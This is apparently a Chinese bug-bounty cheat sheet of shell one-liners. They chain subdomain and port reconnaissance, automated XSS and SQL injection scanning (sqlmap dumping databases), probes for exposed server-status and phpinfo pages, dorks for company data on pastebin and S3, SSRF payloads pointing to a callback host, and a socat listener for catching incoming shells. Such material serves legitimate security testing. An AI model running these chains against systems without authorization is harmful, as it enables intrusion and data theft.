# 1.提取200状态码连接:
cat hosts | urlprobe -c 1000 -t 01 | grep 200 | awk '{print $5}' | tee -a lol-200.txt
# 2.自动化xss扫描:
cat subdomains.txt | waybackurls >> wayback.txt
cat spider.txt wayback.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | dalfox pipe -o xss_results.txt --multicast
# 3.子域爆破,端口探测,存活探测:
.\subfinder -d baidu.com | .\ksubdomain -verify -silent| .\naabu -top-ports 100 -silent | .\httpx -silent -title -status-code
# 4.计算Favicon Recon的Favicon哈希值:
curl -s -L -k https://gitlab.com/favicon.ico | python3 -c 'import mmh3,sys,codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'
# 5.查找SQL注入(命令组合):
subfinder -d target.com | tee -a domains
cat domains | httpx | tee -a urls.alive
cat urls.alive | waybackurls | tee -a urls.check
gf sqli urls.check >> urls.sqli
sqlmap -m urls.sqli --dbs --batch
# 6.通过httpx轻松进行一些敏感信息探测:
cat hosts.txt | httpx -path /server-status?full=true -status-code -content-length
cat hosts.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
cat hosts.txt | httpx -path /phpinfo.php -status-code -content-length -title
# 7.使用Gospider搜索子域:
gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
# 8.使用github和httpx搜索子域:
./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title
# 9.提取APK内的网址:
apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"
# 10.使用shodan和Nuclei进行漏洞探测:
shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/
# 11.提取js文件路径:
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
# 12.使用gospider从主机收集js文件:
xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'
# 13.@Wh11teW0lf:基于Java的服务器的内容发现提示(具有*.jsp,*.jspa等扩展):永远不要忘记servlet!:
ffuf -w words.txt -u https://example.com/FUZZServlet
# ffuf hosts碰撞 另外一款https://github.com/fofapro/Hosts_scan
ffuf -w /path/to/wordlist -u https://target/FUZZ
ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242
ffuf -w /path/to/wordlist -u https://target/FUZZ -maxtime 60
# 14.有用的Google Dorks:
site:http://repl.it intext:company
site:http://zoom.us inurl:company
site:http://atlassian.net inurl:company
site:http://s3.amazonaws.com inurl:company
site:http://pastebin.com inurl:company
# 15. 查AS号对应的IP段:
whois -h whois.radb.net -- '-i origin AS36459' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq
# 16. Finding using SSRFire tool:
./ssrfire.sh -d http://domain.com -s http://pingburl
cat urls.txt | qsreplace http://pingb.in/p/xyz >> ssrfs.txt
ffuf -u "FUZZ" -w ssrfs.txt
go and watch pingb or burp collaboartor
17.持续监听某个端口,可以用来持续监听端口,shell来之后执行后面的操作:
socat -v -dd tcp-listen:<port>,reuseaddr,fork system:'echo ""'
socat -v -dd tcp-listen:444,reuseaddr,fork system:'echo "some command";echo "exit"'
实用的一条命令(bugbounty tips)
最新推荐文章于 2024-03-22 09:52:34 发布